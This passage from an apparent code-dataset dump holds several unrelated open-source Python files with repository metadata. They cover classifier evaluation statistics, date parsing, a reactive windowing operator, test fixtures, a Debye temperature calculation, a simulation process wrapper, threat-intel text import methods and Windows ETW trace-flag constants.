mask[:, class_index] = 1
mask[class_index, class_index] = 0
fp = np.sum(mask * confusion_mat)
fp_arr.append(fp)
# fn is the sum of Cij where i is class_index but j is not
mask = np.zeros((num_classes, num_classes))
mask[class_index, :] = 1
mask[class_index, class_index] = 0
fn = np.sum(mask * confusion_mat)
fn_arr.append(fn)
Counts = namedtuple("Counts", ["tp", "tn", "fp", "fn"])
return {
"confusion_matrix": confusion_mat,
"counts_by_class": Counts(tp_arr, tn_arr, fp_arr, fn_arr),
"counts_overall": Counts(
sum(tp_arr), sum(tn_arr), sum(fp_arr), sum(fn_arr)
),
}
def _print_class_stats_table(self, stats, text_labels, title="Statistics by class"):
"""
Helper for printing a human readable table for class statistics
Returns:
None
"""
title_format = "{:>20}" + "{:>12}" * (len(stats))
common_stats = [
"f_beta",
"precision",
"recall",
"support",
"tp",
"tn",
"fp",
"fn",
]
stat_row_format = (
"{:>20}"
+ "{:>12.3f}" * 3
+ "{:>12.0f}" * 5
+ "{:>12.3f}" * (len(stats) - len(common_stats))
)
table_titles = common_stats + [
stat for stat in stats.keys() if stat not in common_stats
]
print(title + ": \n")
print(title_format.format("class", *table_titles))
for label_index, label in enumerate(text_labels):
row = []
for stat in table_titles:
row.append(stats[stat][label_index])
print(stat_row_format.format(self._truncate_label(label, 18), *row))
print("\n\n")
def _print_class_matrix(self, matrix, text_labels):
"""
Helper for printing a human readable class by class table for displaying
a confusion matrix
Returns:
None
"""
# Doesn't print if there isn't enough space to display the full matrix.
if len(text_labels) > 10:
print(
"Not printing confusion matrix since it is too large. The full matrix is still"
" included in the dictionary returned from get_stats()."
)
return
labels = range(len(text_labels))
title_format = "{:>15}" * (len(labels) + 1)
stat_row_format = "{:>15}" * (len(labels) + 1)
table_titles = [
self._truncate_label(text_labels[label], 10) for label in labels
]
print("Confusion matrix: \n")
print(title_format.format("", *table_titles))
for label_index, label in enumerate(text_labels):
print(
stat_row_format.format(
self._truncate_label(label, 10), *matrix[label_index]
)
)
print("\n\n")
@staticmethod
def _print_overall_stats_table(stats_overall, title="Overall statistics"):
"""
Helper for printing a human readable table for overall statistics
Returns:
None
"""
title_format = "{:>12}" * (len(stats_overall))
common_stats = ["accuracy", "f1_weighted", "tp", "tn", "fp", "fn"]
stat_row_format = (
"{:>12.3f}" * 2
+ "{:>12.0f}" * 4
+ "{:>12.3f}" * (len(stats_overall) - len(common_stats))
)
table_titles = common_stats + [
stat for stat in stats_overall.keys() if stat not in common_stats
]
print(title + ": \n")
print(title_format.format(*table_titles))
row = []
for stat in table_titles:
row.append(stats_overall[stat])
print(stat_row_format.format(*row))
print("\n\n")
@staticmethod
def _truncate_label(label, max_len):
return (label[:max_len] + "..") if len(label) > max_len else label
class StandardModelEvaluation(ModelEvaluation):
def raw_results(self):
"""Returns the raw results of the model evaluation"""
text_labels = []
predicted, expected = [], []
for result in self.results:
text_labels, predicted = self._update_raw_result(
result.predicted, text_labels, predicted
)
text_labels, expected = self._update_raw_result(
result.expected, text_labels, expected
)
return RawResults(
predicted=predicted, expected=expected, text_labels=text_labels
)
def get_stats(self):
"""Prints model evaluation stats in a table to stdout"""
raw_results = self.raw_results()
stats = self._get_common_stats(
raw_results.expected, raw_results.predicted, raw_results.text_labels
)
# Note can add any stats specific to the standard model to any of the tables here
return stats
def print_stats(self):
"""Prints model evaluation stats to stdout"""
raw_results = self.raw_results()
stats = self.get_stats()
self._print_overall_stats_table(stats["stats_overall"])
self._print_class_stats_table(stats["class_stats"], raw_results.text_labels)
self._print_class_matrix(stats["confusion_matrix"], raw_results.text_labels)
class SequenceModelEvaluation(ModelEvaluation):
def __init__(self, config, results):
self._tag_scheme = config.model_settings.get("tag_scheme", "IOB").upper()
super().__init__(config, results)
def raw_results(self):
"""Returns the raw results of the model evaluation"""
text_labels = []
predicted, expected = [], []
predicted_flat, expected_flat = [], []
for result in self.results:
raw_predicted = self.label_encoder.encode(
[result.predicted], examples=[result.example]
)[0]
raw_expected = self.label_encoder.encode(
[result.expected], examples=[result.example]
)[0]
vec = []
for entity in raw_predicted:
text_labels, vec = self._update_raw_result(entity, text_labels, vec)
predicted.append(vec)
predicted_flat.extend(vec)
vec = []
for entity in raw_expected:
text_labels, vec = self._update_raw_result(entity, text_labels, vec)
expected.append(vec)
expected_flat.extend(vec)
return RawResults(
predicted=predicted,
expected=expected,
text_labels=text_labels,
predicted_flat=predicted_flat,
expected_flat=expected_flat,
)
def _get_sequence_stats(self):
"""
TODO: Generate additional sequence level stats
"""
sequence_accuracy = self.get_accuracy()
return {"sequence_accuracy": sequence_accuracy}
@staticmethod
def _print_sequence_stats_table(sequence_stats):
"""
Helper for printing a human readable table for sequence statistics
Returns:
None
"""
title_format = "{:>18}" * (len(sequence_stats))
table_titles = ["sequence_accuracy"]
stat_row_format = "{:>18.3f}" * (len(sequence_stats))
print("Sequence-level statistics: \n")
print(title_format.format(*table_titles))
row = []
for stat in table_titles:
row.append(sequence_stats[stat])
print(stat_row_format.format(*row))
print("\n\n")
def get_stats(self):
"""Prints model evaluation stats in a table to stdout"""
raw_results = self.raw_results()
stats = self._get_common_stats(
raw_results.expected_flat,
raw_results.predicted_flat,
raw_results.text_labels,
)
sequence_stats = self._get_sequence_stats()
stats["sequence_stats"] = sequence_stats
# Note: can add any stats specific to the sequence model to any of the tables here
return stats
def print_stats(self):
"""Prints model evaluation stats to stdout"""
raw_results = self.raw_results()
stats = self.get_stats()
self._print_overall_stats_table(
stats["stats_overall"], "Overall tag-level statistics"
)
self._print_class_stats_table(
stats["class_stats"],
raw_results.text_labels,
"Tag-level statistics by class",
)
self._print_class_matrix(stats["confusion_matrix"], raw_results.text_labels)
self._print_sequence_stats_table(stats["sequence_stats"])
class EntityModelEvaluation(SequenceModelEvaluation):
"""Generates some statistics specific to entity recognition"""
def _get_entity_boundary_stats(self):
"""
Calculate le, be, lbe, tp, tn, fp, fn as defined here:
https://nlpers.blogspot.com/2006/08/doing-named-entity-recognition-dont.html
"""
boundary_counts = BoundaryCounts()
raw_results = self.raw_results()
for expected_sequence, predicted_sequence in zip(
raw_results.expected, raw_results.predicted
):
expected_seq_labels = [
raw_results.text_labels[i] for i in expected_sequence
]
predicted_seq_labels = [
raw_results.text_labels[i] for i in predicted_sequence
]
boundary_counts = get_boundary_counts(
expected_seq_labels, predicted_seq_labels, boundary_counts
)
return boundary_counts.to_dict()
@staticmethod
def _print_boundary_stats(boundary_counts):
title_format = "{:>12}" * (len(boundary_counts))
table_titles = boundary_counts.keys()
stat_row_format = "{:>12}" * (len(boundary_counts))
print("Segment-level statistics: \n")
print(title_format.format(*table_titles))
row = []
for stat in table_titles:
row.append(boundary_counts[stat])
print(stat_row_format.format(*row))
print("\n\n")
def get_stats(self):
stats = super().get_stats()
if self._tag_scheme == "IOB":
boundary_stats = self._get_entity_boundary_stats()
stats["boundary_stats"] = boundary_stats
return stats
def print_stats(self):
raw_results = self.raw_results()
stats = self.get_stats()
self._print_overall_stats_table(
stats["stats_overall"], "Overall tag-level statistics"
)
self._print_class_stats_table(
stats["class_stats"],
raw_results.text_labels,
"Tag-level statistics by class",
)
self._print_class_matrix(stats["confusion_matrix"], raw_results.text_labels)
if self._tag_scheme == "IOB":
self._print_boundary_stats(stats["boundary_stats"])
self._print_sequence_stats_table(stats["sequence_stats"])
|
6094ea0e3cea0f774db6b6e4aa61db82f5f44711
|
bade10db04689048ad1837ced0a6d19e3cc81bf8
|
/sentinelhub/time_utils.py
|
235c2102d03da33f29a98cd069c18483b69541e3
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
sentinel-hub/sentinelhub-py
|
a91dc13f0306b121d4c2bca50557938c93d203bd
|
98d0327e3929999ec07645f77b16fceb7f9c88b9
|
refs/heads/master
| 2023-09-02T17:19:09.717530
| 2023-05-08T07:35:21
| 2023-05-08T07:35:21
| 91,571,506
| 704
| 239
|
MIT
| 2023-08-22T13:29:48
| 2017-05-17T12:00:34
|
Python
|
UTF-8
|
Python
| false
| false
| 8,096
|
py
|
time_utils.py
|
"""
Module with useful time/date functions
"""
import datetime as dt
from typing import Any, Iterable, List, Literal, Optional, Tuple, TypeVar, Union, overload
import dateutil.parser
import dateutil.tz
from .types import RawTimeIntervalType, RawTimeType
TimeType = TypeVar("TimeType", dt.date, dt.datetime) # pylint: disable=invalid-name
def is_valid_time(time: str) -> bool:
"""Check if input string represents a valid time/date stamp
:param time: A string containing a time/date.
:return: `True` is string is a valid time/date, `False` otherwise.
"""
try:
dateutil.parser.parse(time)
return True
except dateutil.parser.ParserError:
return False
@overload
def parse_time(
time_input: RawTimeType,
*,
force_datetime: Literal[False] = False,
allow_undefined: Literal[False] = False,
**kwargs: Any,
) -> dt.date:
...
@overload
def parse_time(
time_input: RawTimeType, *, force_datetime: Literal[True], allow_undefined: Literal[False] = False, **kwargs: Any
) -> dt.datetime:
...
@overload
def parse_time(
time_input: RawTimeType, *, force_datetime: Literal[False] = False, allow_undefined: bool = False, **kwargs: Any
) -> Optional[dt.date]:
...
@overload
def parse_time(
time_input: RawTimeType, *, force_datetime: Literal[True], allow_undefined: bool = False, **kwargs: Any
) -> Optional[dt.datetime]:
...
def parse_time(
time_input: RawTimeType, *, force_datetime: bool = False, allow_undefined: bool = False, **kwargs: Any
) -> Optional[dt.date]:
"""Parse input time/date string
:param time_input: An input representation of a time.
:param force_datetime: If True it will always return datetime.datetime object, if False it can also return only
`datetime.date` object if only date is provided as input.
:param allow_undefined: Flag to allow parsing None or '..' into None.
:param kwargs: Keyword arguments to be passed to `dateutil.parser.parse`. Example: `ignoretz=True`.
:return: A parsed datetime representing the time.
"""
if time_input is None or time_input == "..":
if allow_undefined:
return None
raise ValueError("Input is undefined but `allow_undefined` is set to `False`.")
if isinstance(time_input, dt.date):
if force_datetime and not isinstance(time_input, dt.datetime):
return date_to_datetime(time_input)
if kwargs.get("ignoretz") and isinstance(time_input, dt.datetime):
return time_input.replace(tzinfo=None)
return time_input
time = dateutil.parser.parse(time_input, **kwargs)
if force_datetime or len(time_input) > 10: # This check is not very accurate, but it works for ISO format
return time
return time.date()
def parse_time_interval(
time: Union[RawTimeType, RawTimeIntervalType], allow_undefined: bool = False, **kwargs: Any
) -> Tuple[Optional[dt.datetime], Optional[dt.datetime]]:
"""Parse input into an interval of two times, specifying start and end time, into datetime objects.
The input time can have the following formats, which will be parsed as:
* `YYYY-MM-DD` -> `[YYYY-MM-DD:T00:00:00, YYYY-MM-DD:T23:59:59]`
* `YYYY-MM-DDThh:mm:ss` -> `[YYYY-MM-DDThh:mm:ss, YYYY-MM-DDThh:mm:ss]`
* list or tuple of two dates in form `YYYY-MM-DD` -> `[YYYY-MM-DDT00:00:00, YYYY-MM-DDT23:59:59]`
* list or tuple of two dates in form `YYYY-MM-DDThh:mm:ss` -> `[YYYY-MM-DDThh:mm:ss, YYYY-MM-DDThh:mm:ss]`
All input times can also be specified as `datetime` objects. Instances of `datetime.date` will be treated as
`YYYY-MM-DD` and instance of `datetime.datetime` will be treated as `YYYY-MM-DDThh:mm:ss`.
:param time: An input representation of a time interval.
:param allow_undefined: Boolean flag controls if None or '..' are allowed.
:param kwargs: Keyword arguments to be passed to `parse_time` function.
:return: A pair of datetime objects defining the time interval.
:raises: ValueError
"""
date_interval: Tuple[Optional[dt.date], Optional[dt.date]]
if allow_undefined and time in [None, ".."]:
date_interval = None, None
elif isinstance(time, (str, dt.date)):
parsed_time = parse_time(time, **kwargs)
date_interval = parsed_time, parsed_time
elif isinstance(time, (tuple, list)) and len(time) == 2:
start_date = parse_time(time[0], allow_undefined=allow_undefined, **kwargs)
end_date = parse_time(time[1], allow_undefined=allow_undefined, **kwargs)
date_interval = start_date, end_date
else:
raise ValueError("Time must be a string/datetime object or tuple/list of 2 strings/datetime objects")
start_time, end_time = date_interval
if not isinstance(start_time, dt.datetime) and start_time is not None:
start_time = date_to_datetime(start_time)
if not isinstance(end_time, dt.datetime) and end_time is not None:
end_time = date_to_datetime(end_time, dt.time(hour=23, minute=59, second=59))
if start_time and end_time and start_time > end_time:
raise ValueError("Start of time interval is larger than end of time interval")
return start_time, end_time
@overload
def serialize_time(timestamp_input: Optional[dt.date], *, use_tz: bool = False) -> str:
...
@overload
def serialize_time(timestamp_input: Iterable[Optional[dt.date]], *, use_tz: bool = False) -> Tuple[str, ...]:
...
def serialize_time(
timestamp_input: Union[None, dt.date, Iterable[Optional[dt.date]]], *, use_tz: bool = False
) -> Union[str, Tuple[str, ...]]:
"""Transforms datetime objects into ISO 8601 strings.
:param timestamp_input: A datetime object or a tuple of datetime objects.
:param use_tz: If `True` it will ensure that the serialized string contains a timezone information (typically
with `Z` at the end instead of +00:00). If `False` it will make sure to remove any timezone information.
:return: Timestamp(s) serialized into string(s).
"""
if isinstance(timestamp_input, Iterable):
return tuple(serialize_time(timestamp, use_tz=use_tz) for timestamp in timestamp_input)
if timestamp_input is None:
return ".."
if not isinstance(timestamp_input, dt.date):
raise ValueError("Expected a datetime object or a tuple of datetime objects")
if use_tz:
if not isinstance(timestamp_input, dt.datetime):
raise ValueError(
"Cannot ensure timezone information for datetime.date objects, use datetime.datetime instead"
)
if not timestamp_input.tzinfo:
timestamp_input = timestamp_input.replace(tzinfo=dateutil.tz.tzutc())
elif isinstance(timestamp_input, dt.datetime) and timestamp_input.tzinfo:
timestamp_input = timestamp_input.replace(tzinfo=None)
return timestamp_input.isoformat().replace("+00:00", "Z")
def date_to_datetime(date: dt.date, time: Optional[dt.time] = None) -> dt.datetime:
"""Converts a date object into datetime object.
:param date: A date object.
:param time: An option time object, if not provided it will replace it with `00:00:00`.
:return: A datetime object derived from date and time.
"""
if time is None:
time = dt.datetime.min.time()
return dt.datetime.combine(date, time)
def filter_times(timestamps: Iterable[TimeType], time_difference: dt.timedelta) -> List[TimeType]:
"""Filters out timestamps within time_difference, preserving only the oldest timestamp.
:param timestamps: A list of timestamps.
:param time_difference: A time difference threshold.
:return: An ordered list of timestamps `d_1 <= d_2 <= ... <= d_n` such that `d_(i+1)-d_i > time_difference`.
"""
timestamps = sorted(set(timestamps))
filtered_timestamps: List[TimeType] = []
for current_timestamp in timestamps:
if not filtered_timestamps or current_timestamp - filtered_timestamps[-1] > time_difference:
filtered_timestamps.append(current_timestamp)
return filtered_timestamps
|
2f7e8a8040d1edb3717e91900732a66c55affc53
|
1e528494a929deada984822438b3ab569762e6c6
|
/rx/linq/observable/windowwithtime.py
|
b11edddc06daafb482af220b9ca9e56b69176bda
|
[
"MIT"
] |
permissive
|
Sprytile/Sprytile
|
a0233a00a243f263691921d7e1f6af05c5eb5442
|
6b68d0069aef5bfed6ab40d1d5a94a3382b41619
|
refs/heads/master
| 2022-07-10T06:54:01.003723
| 2020-09-26T07:25:35
| 2020-09-26T07:25:35
| 72,276,917
| 860
| 91
|
MIT
| 2022-07-07T23:37:19
| 2016-10-29T09:47:09
|
Python
|
UTF-8
|
Python
| false
| false
| 2,809
|
py
|
windowwithtime.py
|
from datetime import timedelta
from rx import AnonymousObservable, Observable
from rx.concurrency import timeout_scheduler
from rx.internal.utils import add_ref
from rx.disposables import SingleAssignmentDisposable, CompositeDisposable, \
RefCountDisposable, SerialDisposable
from rx.subjects import Subject
from rx.internal import extensionmethod
@extensionmethod(Observable)
def window_with_time(self, timespan, timeshift=None, scheduler=None):
source = self
if timeshift is None:
timeshift = timespan
if not isinstance(timespan, timedelta):
timespan = timedelta(milliseconds=timespan)
if not isinstance(timeshift, timedelta):
timeshift = timedelta(milliseconds=timeshift)
scheduler = scheduler or timeout_scheduler
def subscribe(observer):
timer_d = SerialDisposable()
next_shift = [timeshift]
next_span = [timespan]
total_time = [timedelta(0)]
q = []
group_disposable = CompositeDisposable(timer_d)
ref_count_disposable = RefCountDisposable(group_disposable)
def create_timer():
m = SingleAssignmentDisposable()
timer_d.disposable = m
is_span = False
is_shift = False
if next_span[0] == next_shift[0]:
is_span = True
is_shift = True
elif next_span[0] < next_shift[0]:
is_span = True
else:
is_shift = True
new_total_time = next_span[0] if is_span else next_shift[0]
ts = new_total_time - total_time[0]
total_time[0] = new_total_time
if is_span:
next_span[0] += timeshift
if is_shift:
next_shift[0] += timeshift
def action(scheduler, state=None):
s = None
if is_shift:
s = Subject()
q.append(s)
observer.on_next(add_ref(s, ref_count_disposable))
if is_span:
s = q.pop(0)
s.on_completed()
create_timer()
m.disposable = scheduler.schedule_relative(ts, action)
q.append(Subject())
observer.on_next(add_ref(q[0], ref_count_disposable))
create_timer()
def on_next(x):
for s in q:
s.on_next(x)
def on_error(e):
for s in q:
s.on_error(e)
observer.on_error(e)
def on_completed():
for s in q:
s.on_completed()
observer.on_completed()
group_disposable.add(source.subscribe(on_next, on_error, on_completed))
return ref_count_disposable
return AnonymousObservable(subscribe)
|
0b6bf31b546492560acfcb2425f6aa3de878ff51
|
e45cf6221f170e3077770dbf19a1ad3dd244cd10
|
/tests/conftest.py
|
84cb475f396701553e6bc46ac82ab1a113a99f6d
|
[
"Apache-2.0"
] |
permissive
|
anchore/anchore-cli
|
7b12bc80b428ed6d52717ceeaf5182953e4bbc53
|
f511644cf701646f002af6b392421304da508c86
|
refs/heads/master
| 2023-05-24T20:27:58.866558
| 2022-06-22T16:09:29
| 2022-06-22T16:09:29
| 102,535,562
| 119
| 64
|
Apache-2.0
| 2023-05-23T02:03:47
| 2017-09-05T22:27:17
|
Python
|
UTF-8
|
Python
| false
| false
| 920
|
py
|
conftest.py
|
import json
import pytest
class Factory(object):
def __init__(self, **kw):
for k, v in kw.items():
setattr(self, k, v)
@pytest.fixture
def stub_response():
def apply(status_code=200, text="", json_text=None):
if json_text is not None:
text = json.dumps(json_text)
response = Factory(status_code=status_code, text=text)
return response
return apply
@pytest.fixture(autouse=True)
def no_fds_closing(monkeypatch):
"""
The ClickRunner test helper breaks when stdout and stderr is closed as it is trying to capture
whatever the tool was sending as output. This env is prevents anchore-cli from closing them
allowing the ClickRunner to work.
Related issues:
* https://github.com/pallets/click/issues/824
* https://github.com/pytest-dev/pytest/issues/3344
"""
monkeypatch.setenv("ANCHORE_CLI_NO_FDS_CLEANUP", "1")
|
89c3bf631ec45521b34551aefc3e687b45cf2f6c
|
9d0228f3f7ee9cee0794319d4affc161b0a7adc2
|
/qmpy/analysis/debye/sound_waves.py
|
d24a1badd3459beb67f37772c044fd30e2e9d7b0
|
[
"MIT"
] |
permissive
|
wolverton-research-group/qmpy
|
db8a450a5708aac63aa39e104745b5cb0a4fa930
|
dede5bdf4aa3ea1187a7bc273e86336c24aadb25
|
refs/heads/master
| 2023-01-24T17:18:48.335699
| 2022-08-23T01:12:29
| 2022-08-23T01:12:29
| 18,248,720
| 124
| 65
|
MIT
| 2023-01-11T02:04:51
| 2014-03-29T19:18:53
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 4,652
|
py
|
sound_waves.py
|
#!/usr/bin/python
# sound_waves.py v1.1 12-3-2011 Jeff Doak jeff.w.doak@gmail.com
import sys
import scipy as sp
from scipy import linalg
from scipy.integrate import dblquad
import read_file
BOLTZCONST = 1.381e-23 # J/K
PLANCKCONST = 6.626e-34 # J*s
AVONUM = 6.022e23 # things/mol
def dir_cosines(dir, coords=sp.identity(3)):
"""Returns a vector containing the direction cosines between vector dir, and
the coordinate system coords. Default coordinate system is an orthonormal
cartesian coordinate system."""
cosines = sp.dot(coords, dir) / linalg.norm(dir)
return cosines
def make_gamma(dc, C):
"""
Returns a matrix containing the modified set of elastic constants, C,
transformed by the direction cosines, dc.
"""
Gamma = sp.zeros((3, 3))
Gamma[0, 0] = dc[0] ** 2 * C[0, 0] + dc[1] ** 2 * C[5, 5] + dc[2] ** 2 * C[4, 4]
Gamma[0, 0] += 2 * dc[1] * dc[2] * C[4, 5] + 2 * dc[2] * dc[0] * C[0, 4]
Gamma[0, 0] += 2 * dc[0] * dc[1] * C[0, 5]
Gamma[1, 1] = dc[0] ** 2 * C[5, 5] + dc[1] ** 2 * C[1, 1] + dc[2] ** 2 * C[3, 3]
Gamma[1, 1] += 2 * dc[1] * dc[2] * C[1, 3] + 2 * dc[2] * dc[0] * C[3, 5]
Gamma[1, 1] += 2 * dc[0] * dc[1] * C[1, 5]
Gamma[2, 2] = dc[0] ** 2 * C[4, 4] + dc[1] ** 2 * C[3, 3] + dc[2] ** 2 * C[2, 2]
Gamma[2, 2] += 2 * dc[1] * dc[2] * C[2, 3] + 2 * dc[2] * dc[0] * C[2, 4]
Gamma[2, 2] += 2 * dc[0] * dc[1] * C[3, 4]
Gamma[0, 1] = dc[0] ** 2 * C[0, 5] + dc[1] ** 2 * C[1, 5] + dc[2] ** 2 * C[3, 4]
Gamma[0, 1] += dc[1] * dc[2] * (C[3, 5] + C[1, 4]) + dc[2] * dc[0] * (
C[0, 3] + C[4, 5]
)
Gamma[0, 1] += dc[0] * dc[1] * (C[0, 1] + C[5, 5])
Gamma[0, 2] = dc[0] ** 2 * C[0, 4] + dc[1] ** 2 * C[3, 5] + dc[2] ** 2 * C[2, 4]
Gamma[0, 2] += dc[1] * dc[2] * (C[3, 4] + C[2, 5]) + dc[2] * dc[0] * (
C[0, 2] + C[4, 4]
)
Gamma[0, 2] += dc[0] * dc[1] * (C[0, 3] + C[4, 5])
Gamma[1, 2] = dc[0] ** 2 * C[4, 5] + dc[1] ** 2 * C[1, 3] + dc[2] ** 2 * C[2, 3]
Gamma[1, 2] += dc[1] * dc[2] * (C[3, 3] + C[1, 2]) + dc[2] * dc[0] * (
C[2, 5] + C[3, 4]
)
Gamma[1, 2] += dc[0] * dc[1] * (C[1, 4] + C[3, 5])
Gamma[1, 0] = Gamma[0, 1]
Gamma[2, 0] = Gamma[0, 2]
Gamma[2, 1] = Gamma[1, 2]
return Gamma
def spherical_integral(C, rho):
"""
Calculate the integral of a function over a unit sphere.
"""
# phi - azimuthal angle (angle in xy-plane)
# theta - polar angle (angle between z and xy-plane)
# ( y , x )
def func(theta, phi, C, rho): # Test function. Can I get 4*pi^2????
x = sp.cos(phi) * sp.sin(theta)
y = sp.sin(phi) * sp.sin(theta)
z = sp.cos(theta)
# dir = sp.array((x,y,z))
# dc = dir_cosines(dir)
dc = sp.array((x, y, z)) # Turns out these are direction cosines!
Gamma = make_gamma(dc, C)
rho_c_square = linalg.eigvals(Gamma).real # GPa
rho_c_square = rho_c_square * 1e9 # Pa
sound_vel = sp.sqrt(rho_c_square / rho) # m/s
integrand = (
1 / (sound_vel[0] ** 3) + 1 / (sound_vel[1] ** 3) + 1 / (sound_vel[2] ** 3)
)
return integrand * sp.sin(theta)
# ( y , x )
# def sfunc(theta,phi,args=()):
# return func(theta,phi,args)*sp.sin(theta)
integral, error = dblquad(
func, 0, 2 * sp.pi, lambda g: 0, lambda h: sp.pi, args=(C, rho)
)
return integral
# direction = sp.array((1.0,1.0,1.0))
# dc = dir_cosines(direction)
# C = read_file.read_file(sys.argv[1])
# C.pop(0)
# C = sp.array(C,float)
# Gamma = make_gamma(dc,C)
# density = 7500 #kg/m**3
# density = float(read_file.read_file(sys.argv[2])[0][0])
# rho_c_square = linalg.eigvals(Gamma) #GPa
# rho_c_square = rho_c_square*1e9 #Pa
# sound_vel = sp.sqrt(rho_c_square/density).real
# avg_vel = sp.average(sound_vel)
# print Gamma
# print direction
# print C
# print rho_c_square
# print rho_c_square.real
# print sound_vel," in m/s"
# print avg_vel
# print spherical_integral(C,density)
def main(argv):
C = read_file.read_file(argv[0])
C.pop(0)
C = sp.array(C, float)
density, natoms, molmass = read_file.read_file(argv[1])[0]
density = float(density) # kg/m**3
natoms = int(natoms)
molmass = float(molmass) # kg/mol
integral = spherical_integral(C, density) # (s/m)**3
mean_vel = (integral / 12.0 / sp.pi) ** (-1 / 3.0)
debeye_temp = (
PLANCKCONST
/ BOLTZCONST
* (3.0 * natoms * AVONUM * density / 4.0 / sp.pi / molmass) ** (1 / 3.0)
* mean_vel
)
print(debeye_temp, mean_vel)
if __name__ == "__main__":
main(sys.argv[1:])
|
81624711778434057781b0d27575ff3b97abc81e
|
56a77194fc0cd6087b0c2ca1fb6dc0de64b8a58a
|
/kratos/python_scripts/check_same_model_part_using_skin_process.py
|
73b2253342ca25484b024f83a3de8f1a8e12dc36
|
[
"BSD-3-Clause"
] |
permissive
|
KratosMultiphysics/Kratos
|
82b902a2266625b25f17239b42da958611a4b9c5
|
366949ec4e3651702edc6ac3061d2988f10dd271
|
refs/heads/master
| 2023-08-30T20:31:37.818693
| 2023-08-30T18:01:01
| 2023-08-30T18:01:01
| 81,815,495
| 994
| 285
|
NOASSERTION
| 2023-09-14T13:22:43
| 2017-02-13T10:58:24
|
C++
|
UTF-8
|
Python
| false
| false
| 1,563
|
py
|
check_same_model_part_using_skin_process.py
|
# Importing the Kratos Library
import KratosMultiphysics
def Factory(settings, model):
if not isinstance(settings, KratosMultiphysics.Parameters):
raise Exception("expected input shall be a Parameters object, encapsulating a json string")
return CheckSameModelPartUsingSkinDistanceProcess(model, settings["Parameters"])
class CheckSameModelPartUsingSkinDistanceProcess(KratosMultiphysics.Process):
"""This process checks that the model part is the same using the skin distance
Only the member variables listed below should be accessed directly.
Public member variables:
Model -- the container of the different model parts.
settings -- Kratos parameters containing solver settings.
"""
def __init__(self, model, settings):
""" The default constructor of the class
Keyword arguments:
self -- It signifies an instance of a class.
model -- the container of the different model parts.
settings -- Kratos parameters containing solver settings.
"""
KratosMultiphysics.Process.__init__(self)
# Assigning values
self.model = model
# Create the process
self.process = KratosMultiphysics.CheckSameModelPartUsingSkinDistanceProcess3D(self.model, settings)
def ExecuteBeforeSolutionLoop(self):
"""This method is executed in before initialize the solution step
Keyword arguments:
self -- It signifies an instance of a class.
"""
self.process.Execute()
|
ee3157ac5d0cea57be26acbb190f86a384b4fbae
|
ab5d1586266e525eb32823851dd3c774b60fabec
|
/plugins/import_methods/text.py
|
c6fa970c9c561715225ec625fad1a7c8384478bb
|
[
"Apache-2.0"
] |
permissive
|
yeti-platform/yeti
|
d31fa464582b6d6731a437d7ceab9e730ce09c75
|
dccc691d48177f921ef1134c8fd22f064dc085a2
|
refs/heads/master
| 2023-09-01T13:54:19.258408
| 2023-06-29T12:44:55
| 2023-06-29T12:44:55
| 47,927,876
| 1,444
| 321
|
Apache-2.0
| 2023-09-12T14:49:55
| 2015-12-13T16:54:26
|
Python
|
UTF-8
|
Python
| false
| false
| 656
|
py
|
text.py
|
from core.investigation import ImportMethod
class ImportText(ImportMethod):
def do_import(self, results, filepath):
with open(filepath, "r") as f:
content = f.read()
results.investigation.update(import_text=content)
class ImportTextPlain(ImportText):
default_values = {
"name": "import_text",
"description": "Perform investigation import from a text document.",
"acts_on": "text/plain",
}
class ImportXML(ImportText):
default_values = {
"name": "import_xml",
"description": "Perform investigation import from an XML document.",
"acts_on": "text/xml",
}
|
1d6b67f0be0fb43647bee2d523d942fd51e7a8b1
|
2ddbcefa36bf68ad2e7f4018c5283b7aef726a1f
|
/etw/evntrace.py
|
287cacf1b4fd5b9f4153fa24d3d698813838fa97
|
[
"Apache-2.0"
] |
permissive
|
fireeye/pywintrace
|
c275ba90f8ec942a4ff2f03fb700c562859e5f25
|
977eeb85d08982c160d9594f5f875f54db7a3415
|
refs/heads/master
| 2023-08-16T14:29:28.361857
| 2023-03-23T18:41:16
| 2023-03-23T18:41:16
| 102,869,990
| 273
| 73
|
Apache-2.0
| 2023-03-23T18:41:18
| 2017-09-08T14:27:01
|
Python
|
UTF-8
|
Python
| false
| false
| 11,529
|
py
|
evntrace.py
|
########################################################################
# Copyright 2017 FireEye Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
########################################################################
import ctypes as ct
import ctypes.wintypes as wt
from etw.GUID import GUID
from etw import evntcons as ec
from etw import evntprov as ep
from etw.common import TIME_ZONE_INFORMATION
from etw.wmistr import WNODE_HEADER
KERNEL_LOGGER_NAME = "NT Kernel Logger"
KERNEL_LOGGER_NAME_LOWER = "nt kernel logger"
ENABLE_TRACE_PARAMETERS_VERSION = 1
ENABLE_TRACE_PARAMETERS_VERSION_2 = 2
EVENT_TRACE_FLAG_PROCESS = 0x00000001
EVENT_TRACE_FLAG_THREAD = 0x00000002
EVENT_TRACE_FLAG_IMAGE_LOAD = 0x00000004
EVENT_TRACE_FLAG_PROCESS_COUNTERS = 0x00000008
EVENT_TRACE_FLAG_CSWITCH = 0x00000010
EVENT_TRACE_FLAG_DPC = 0x00000020
EVENT_TRACE_FLAG_INTERRUPT = 0x00000040
EVENT_TRACE_FLAG_SYSTEMCALL = 0x00000080
EVENT_TRACE_FLAG_DISK_IO = 0x00000100
EVENT_TRACE_FLAG_DISK_FILE_IO = 0x00000200
EVENT_TRACE_FLAG_DISK_IO_INIT = 0x00000400
EVENT_TRACE_FLAG_DISPATCHER = 0x00000800
EVENT_TRACE_FLAG_MEMORY_PAGE_FAULTS = 0x00001000
EVENT_TRACE_FLAG_MEMORY_HARD_FAULTS = 0x00002000
EVENT_TRACE_FLAG_VIRTUALALLOC = 0x00004000
EVENT_TRACE_FLAG_NETWORK_TCPIP = 0x00010000
EVENT_TRACE_FLAG_REGISTRY = 0x00020000
EVENT_TRACE_FLAG_DBGPRINT = 0x00040000
EVENT_TRACE_FLAG_ALPC = 0x00100000
EVENT_TRACE_FLAG_SPLIT_IO = 0x00200000
EVENT_TRACE_FLAG_DRIVER = 0x00800000
EVENT_TRACE_FLAG_PROFILE = 0x01000000
EVENT_TRACE_FLAG_FILE_IO = 0x02000000
